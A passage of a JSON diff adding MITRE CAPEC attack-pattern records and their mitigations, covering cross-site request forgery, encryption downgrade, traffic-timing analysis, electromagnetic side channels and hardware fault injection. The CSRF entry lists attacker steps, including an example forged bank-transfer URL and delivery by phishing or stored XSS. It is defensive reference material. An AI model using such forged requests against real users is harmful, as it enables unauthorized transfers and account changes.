"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. 
In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.", + "external_references": [ + { + "external_id": "CAPEC-62", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/62.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1275", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1275.html" + }, + { + "description": "Cross-Site Request Forgery", + "external_id": "09", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Cross-Site-Request-Forgery" + }, + { + "description": "Cross Site Request Forgery (CSRF)", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/csrf" + }, + { + "description": "Thomas Schreiber, Session Riding: A Widespread Vulnerability in Today's Web Applications, SecureNet GmbH", + "external_id": "REF-62", + "source_name": "reference_from_CAPEC", + "url": "https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-602", + "source_name": "reference_from_CAPEC", + "url": 
"https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.html" + } + ], + "id": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Cross Site Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Session Riding" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.\n The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.\n The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore target website: The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.

  2. Techniques
    Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server
    Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server
    View HTML source of web pages that contain links or buttons that perform actions of interest.

Experiment

  1. Create a link that when clicked on, will execute the interesting functionality.: The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.

  2. Techniques
    Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)
    Create a form that will submit a POST request (e.g.

Exploit

  1. Convince user to click on link: Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.

  2. Techniques
    Execute a phishing attack and send the user an e-mail convincing them to click on a link.
    Execute a stored XSS attack on a website to permanently embed the malicious link into the website.
    Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.
    Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4" + ], + "x_capec_resources_required": [ + "All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use cryptographic tokens to associate a request with a specific action. The token can be regenerated at every request so that if a request with an invalid token is encountered, it can be reliably discarded. 
The token is considered invalid if it arrived with a request other than the action it was supposed to be associated with.", + "id": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.", + "id": "course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e4e7c46-5802-4623-bfb2-726d5643649a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Additionally, the user can also be prompted to confirm an action every time an action concerning potentially sensitive data is invoked. This way, even if the attacker manages to get the user to click on a malicious link and request the desired action, the user has a chance to recover by denying confirmation. This solution is also implicitly tied to using a second factor of authentication before performing such actions.", + "id": "course-of-action--d48ac0ea-9821-4d1d-b819-78cf36562e97", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5334f93e-090e-4dc7-9634-9cf8d617820f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d48ac0ea-9821-4d1d-b819-78cf36562e97", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In general, every request must be checked for the appropriate authentication token as well as authorization in the current session context.", + "id": "course-of-action--77756b2a-ad30-4992-acdb-13c8dae467d8", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-3", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e911413e-496d-4b6e-afff-88e8e3302abb", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--77756b2a-ad30-4992-acdb-13c8dae467d8", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker forces the encryption level to be lowered, thus enabling a successful attack against the encrypted data.", + "external_references": [ + { + "external_id": "CAPEC-620", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/620.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + }, + { + "description": "Weaken Encryption", + "external_id": "T1600", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1600" + } + ], + "id": "attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Drop Encryption Level", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680" 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).", + "external_references": [ + { + "external_id": "CAPEC-621", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/621.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Analysis of Packet Timing and Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes." + ], + "x_capec_skills_required": { + "High": "These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Distort packet sizes and timing at VPN layer by adding padding to normalize packet sizes and timing delays to reduce information leakage via timing.", + "id": "course-of-action--3d82800d-a207-4cf5-8acb-34298fed624c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-621-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce899b44-526f-4892-80d2-510f96e94715", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3d82800d-a207-4cf5-8acb-34298fed624c", + "target_ref": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively monitors electromagnetic emanations that are produced by the targeted electronic device as an unintentional side-effect of its processing. From these emanations, the attacker derives information about the data that is being processed (e.g. the attacker can recover cryptographic keys by monitoring emanations associated with cryptographic processing). This style of attack requires proximal access to the device, however attacks have been demonstrated at public conferences that work at distances of up to 10-15 feet. 
There have not been any significant studies to determine the maximum practical distance for such attacks. Since the attack is passive, it is nearly impossible to detect and the targeted device will continue to operate as normal after a successful attack.", + "external_references": [ + { + "external_id": "CAPEC-622", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/622.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Electromagnetic Side-Channel Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data. For mobile devices, depending on which keys are compromised, the attacker may be able to decrypt VOIP communications, impersonate the targeted caller, or access the enterprise VPN server.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Proximal access to the device." + ], + "x_capec_skills_required": { + "Medium": "Sophisticated attack, but detailed techniques published in the open literature." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize side-channel resistant implementations of all crypto algorithms.", + "id": "course-of-action--2e9301ad-e907-414c-9bac-0be1517b0112", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--518cf128-c5dd-41bf-920c-c59464ae3e89", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e9301ad-e907-414c-9bac-0be1517b0112", + "target_ref": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of all devices that contain secret key information. 
(even when devices are not in use)", + "id": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef792ac3-e23f-463b-8456-e2cb9549a020", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "target_ref": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Compromising Emanations (CE) are defined as unintentional signals which an attacker may intercept and analyze to disclose the information processed by the targeted equipment. Commercial mobile devices and retransmission devices have displays, buttons, microchips, and radios that emit mechanical emissions in the form of sound or vibrations. 
Capturing these emissions can help an adversary understand what the device is doing.", + "external_references": [ + { + "external_id": "CAPEC-623", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/623.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--3d5bbdf7-b642-43b4-b4be-d9f35923380d", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Compromising Emanations Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Capture vibrations/emissions from the handset or retransmission device display screen to recreat display information from a distance.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Proximal access to the device." + ], + "x_capec_skills_required": { + "High": "Sophisticated attack." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "None are known.", + "id": "course-of-action--1f959357-f511-4f0e-9b12-51ee99284c2f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-623-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2ad7be7d-7b09-4472-bc30-41894c39f568", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f959357-f511-4f0e-9b12-51ee99284c2f", + "target_ref": "attack-pattern--3d5bbdf7-b642-43b4-b4be-d9f35923380d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary uses disruptive signals or events, or alters the physical environment a device operates in, to cause faulty behavior in electronic devices. This can include electromagnetic pulses, laser pulses, clock glitches, ambient temperature extremes, and more. 
When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information.", + "external_references": [ + { + "external_id": "CAPEC-624", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/624.html" + }, + { + "external_id": "CWE-1247", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1247.html" + }, + { + "external_id": "CWE-1248", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1248.html" + }, + { + "external_id": "CWE-1256", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1256.html" + }, + { + "external_id": "CWE-1319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1319.html" + }, + { + "external_id": "CWE-1332", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1332.html" + }, + { + "external_id": "CWE-1334", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1334.html" + }, + { + "external_id": "CWE-1338", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1338.html" + }, + { + "external_id": "CWE-1351", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1351.html" + } + ], + "id": "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Fault Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Side-Channel Attack" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)", + "Bypass Protection Mechanism (An adversary capable of successfully collecting and analyzing 
sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)", + "Hide Activities (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (If an adversary is able to inject data via a fault or side channel vulnerability towards malicious ends, the integrity of the application or information system will be compromised.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255" + ], + "x_capec_prerequisites": [ + "Physical access to the system", + "The adversary must be cognizant of where fault injection vulnerabilities exist in the system in order to leverage them for exploitation." + ], + "x_capec_resources_required": [ + "\n The relevant sensors and tools to detect and analyze fault/side-channel data from a system.\n A tool capable of injecting fault/side-channel data into a system or application.\n " + ], + "x_capec_skills_required": { + "High": "Adversaries require non-trivial technical skills to create and implement fault injection attacks. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement robust physical security countermeasures and monitoring.", + "id": "course-of-action--f6d53020-4245-4f4d-848b-e5ddf8d7db8e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-624-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92d3b28d-cca3-4d44-82ca-d1fce4083918", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f6d53020-4245-4f4d-848b-e5ddf8d7db8e", + "target_ref": "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Fault injection attacks against mobile devices use disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information. 
Although this attack usually requires physical control of the mobile device, it is non-destructive, and the device can be used after the attack without any indication that secret keys were compromised.", + "external_references": [ + { + "external_id": "CAPEC-625", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/625.html" + }, + { + "external_id": "CWE-1247", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1247.html" + }, + { + "external_id": "CWE-1248", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1248.html" + }, + { + "external_id": "CWE-1256", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1256.html" + }, + { + "external_id": "CWE-1319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1319.html" + }, + { + "external_id": "CWE-1332", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1332.html" + }, + { + "external_id": "CWE-1334", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1334.html" + }, + { + "external_id": "CWE-1338", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1338.html" + }, + { + "external_id": "CWE-1351", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1351.html" + } + ], + "id": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Mobile Device Fault Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (Extract long-term secret keys (e.g. 
keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic.)" + ], + "Confidentiality": [ + "Read Data (Extract long-term secret keys (e.g. keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_skills_required": { + "High": "Adversaries require non-trivial technical skills to create and implement fault injection attacks on mobile devices. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required. This prerequisite makes the attack challenging to perform (assuming that physical security countermeasures and monitoring are in place)." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--224113f1-e834-46f3-9de8-b99b4daabd5a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "target_ref": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changes to secret keys and certificates.", + "id": "course-of-action--b219b8f8-c28d-470b-8031-48f247b21a37", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-625-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + 
